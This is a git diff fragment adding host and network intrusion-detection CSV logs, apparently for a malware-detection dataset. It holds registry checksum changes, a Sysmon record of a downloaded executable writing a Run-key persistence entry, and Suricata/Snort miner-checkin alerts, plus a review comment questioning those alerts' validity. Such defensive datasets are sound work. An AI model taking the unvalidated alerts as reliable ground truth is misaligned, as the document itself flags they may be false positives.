md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: 'd35485293b6324039fb84a913c4ac605c9050f4a' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 22, 2020 @ 15:27:33.124",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '737129e2f8cfe11a96ca093d49dee7f2' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '559d4974169b9c45d6f345deb22f6aeee8abefa8' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" +"May 22, 2020 @ 15:27:27.887",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. 
+Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +" +"May 22, 2020 @ 15:27:21.836",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:36.991 +ProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ProcessId: 6980 +Image: C:\Users\John Williams\Downloads\appveif.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\appveif +Details: C:\Users\John Williams\Downloads\appveif.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:37.001207200Z"",""eventRecordID"":""917"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:36.991\r\nProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nProcessId: 6980\r\nImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\appveif\r\nDetails: C:\\Users\\John Williams\\Downloads\\appveif.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:36.991"",""processGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""processId"":""6980"",""image"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\appveif.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\appveif"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe""}}}" diff --git a/data/MW_1_NIDS.csv b/data/MW_1_NIDS.csv new file mode 100644 index 0000000..abb5882 --- /dev/null +++ b/data/MW_1_NIDS.csv 
@@ -0,0 +1,25 @@
+"@timestamp",message,"log.file.path"
+"Apr 4, 2020 @ 12:25:45.639","04/04/2020-12:25:39.613075 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50072 -> 204.79.197.222:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:25:45.621","04/04-12:25:39.613075 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50072 -> 204.79.197.222:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:25:30.635","04/04/2020-12:25:24.606004 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50071 -> 204.79.197.254:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:25:30.618","04/04-12:25:24.606004 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50071 -> 204.79.197.254:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:25:15.594","04/04/2020-12:25:09.595071 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50061 -> 13.107.136.254:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:25:15.588","04/04-12:25:09.595071 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50061 -> 13.107.136.254:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:25:00.589","04/04/2020-12:24:54.580622 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50024 -> 40.112.91.29:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:25:00.584","04/04-12:24:54.580622 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50024 -> 40.112.91.29:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:45.586","04/04/2020-12:24:39.527292 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50014 -> 95.101.21.130:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:45.586","04/04/2020-12:24:39.539403 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50015 -> 13.107.246.254:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:45.581","04/04-12:24:39.527292 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50014 -> 95.101.21.130:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:45.581","04/04-12:24:39.539403 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50015 -> 13.107.246.254:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:30.584","04/04/2020-12:24:24.514535 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49951 -> 13.107.3.128:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:30.575","04/04-12:24:24.514535 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49951 -> 13.107.3.128:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:15.556","04/04/2020-12:24:09.415370 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49947 -> 40.90.23.153:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:15.556","04/04/2020-12:24:09.506666 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49948 -> 204.79.197.200:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:12.543","04/04-12:24:09.415370 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49947 -> 40.90.23.153:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:12.543","04/04-12:24:09.506666 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49948 -> 204.79.197.200:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:24:00.553","04/04/2020-12:23:54.306232 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49935 -> 40.67.251.132:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:24:00.553","04/04/2020-12:23:54.332570 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49936 -> 23.217.99.136:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:23:57.540","04/04-12:23:54.306232 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49935 -> 40.67.251.132:443","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:23:57.540","04/04-12:23:54.332570 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49936 -> 23.217.99.136:80","/var/log/snort/alert.fast"
+"Apr 4, 2020 @ 12:20:45.502","04/04/2020-12:20:39.547395 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49837 -> 20.44.208.51:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 12:20:45.502","04/04-12:20:39.378041 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49837 -> 20.44.208.51:80","/var/log/snort/alert.fast"
diff --git a/data/MW_20_HIDS_1.csv b/data/MW_20_HIDS_1.csv
new file mode 100644
index 0000000..a5d1e80
--- /dev/null
+++ b/data/MW_20_HIDS_1.csv
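Review bot: The `@timestamp` column is Kibana's display format (`Apr 4, 2020 @ 12:25:45.639`) with no timezone, and the sensor timestamps inside `message` come in two shapes, Suricata's `04/04/2020-12:25:39.613075` and Snort's `04/04-12:25:39.613075` with no year, so anyone correlating this file with the HIDS exports has to guess both the zone and the year. A one-line data dictionary in the README would settle it, e.g. `NIDS exports: @timestamp is ELK ingest time (zone: TODO confirm), roughly 6 s after the sensor time embedded in message; message is the sensor's own fast.log line`. Every Suricata alert here also has a Snort twin on the same SID `1:2024792:4` and the same flow, so a consumer counting rows counts each detection twice; say whether the two sensors are to be treated as one detection source. All of the miner-checkin hits are TLS connections on port 443 to 204.79.197.x, 13.107.x.x, 40.x.x.x and 95.101.21.130, which look like large cloud/CDN address ranges rather than a mining pool, so if this file serves as ground truth for the sample the README should state whether these policy-rule hits were validated or are recorded as-is.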
@@ -0,0 +1,286 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 10:18:49.646",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:49.631",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:48.973",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:48.943",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:47.193",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:47.176",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:44.567",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:41.458",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '01a985bca6ad7246ea3a7ca8195d93e9' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '8010a779860390583ffbf9af8ead75fdfb5c8385' +" +"Apr 6, 2020 @ 10:18:40.661",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'fde4d09149bdcdc70349bc82e0dd2af6' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '10cf5ba179fe268341aff35b424f90f1f18f255f' +" +"Apr 6, 2020 @ 10:18:40.504",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:40.477",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 10:18:40.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:36.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '63b2faa8277773a4b13b16a3c66bf06c' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '8775a9f7233f640e824bb5f5b189261e69d2c90e' +" +"Apr 6, 2020 @ 10:18:35.098",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. 
+Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:32.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '6f381add2e6261dd58110a2cfcc3e5a5' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'b54d51c98fc3e258af23c9827605cf29e14edab8' +" +"Apr 6, 2020 @ 10:18:31.864",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:30.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 10:18:21.990",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. 
+Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'e5055e06c191756d0c2b480dc41a1a39' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'd06a599274d5d21d16ea461e60fc61b2d8e8ba98' +" +"Apr 6, 2020 @ 10:18:21.717",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:18:13.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4545fdfa85f82bb3f47e1832da72a696' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'b4fc38f5f5a0e09f094d02286077899027b196a7' +" +"Apr 6, 2020 @ 10:18:12.361",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:12.323",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.316",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:12.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.190",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:11.059",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a40f' was added. 
+" +"Apr 6, 2020 @ 10:18:11.050",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:11.002",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:10.996",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:10.951",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'a0a3fbc0146d4cec152ee8f8a35a01bd' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'c450722f44b2a1ba2f2466819980374b6af74692' +" +"Apr 6, 2020 @ 10:18:09.589",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.580",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:09.487",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:09.438",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a40f\Security' was added. 
+" +"Apr 6, 2020 @ 10:18:06.833",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:06.827",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 10:18:06.822",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 10:18:06.816",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 10:18:06.808",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 10:18:06.801",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 10:18:06.797",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:05.577",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:05.574",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:05.474",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '5a754fcbdb46a7ff91137a7b553dc3bc' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '79288fe9f75a96d05a584cb89f96d7d4e7cf6429' +" +"Apr 6, 2020 @ 10:18:05.467",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '0c2db3419a15dba7e52bd9e1bed61e50' +New md5sum is : '0830111e6b80b1ae24178fbba8857fdd' +Old sha1sum was: 'beb5a77c657190ccf5e14d9c81f4201b9c95f292' +New sha1sum is : 'a6192d15c24d5dce1865dd445c41e167c220ae7a' +" +"Apr 6, 2020 @ 10:18:05.464",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '569a53da113e27941126d6f916d48ef7' +New md5sum is : '5738de9f7a814537cd2bd0a998907aa3' +Old sha1sum was: '1b2f772dfe95412bcd506ff44a8678ddcce28603' +New sha1sum is : '985678f0758612fec14a8801e20632d728cbf66c' +" +"Apr 6, 2020 @ 10:18:02.799",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:02.789",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a40f\Security' was added. 
+" +"Apr 6, 2020 @ 10:17:07.330",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:17:05.431",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:16:39.099",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:35.552",3,"Windows User Logoff", +"Apr 6, 2020 @ 10:16:35.537",3,"Windows User Logoff", +"Apr 6, 2020 @ 10:16:35.510",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:35.490",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:35.428",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 10:16:35.413",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 10:16:34.962",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 10:16:29.546",3,"The Windows Search Service started", +"Apr 6, 2020 @ 10:16:28.933",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 10:16:28.687",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:28.478",3,"The database engine attached a database", +"Apr 6, 2020 @ 10:16:28.303",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 10:16:21.610",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:16:21.112",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:21.071",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:20.955",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:20.424",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 10:16:19.444",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." 
+"Apr 6, 2020 @ 10:15:26.004",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:15:25.973",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:14:45.800",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +" +"Apr 6, 2020 @ 10:14:45.784",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +" +"Apr 6, 2020 @ 10:14:32.016",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '9cc27b7eb9655d243277f5122c2080d2' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '873e899fee0da9976ee153fd715d7966dee1171b' +" +"Apr 6, 2020 @ 10:14:32.009",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 10:14:18.426",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
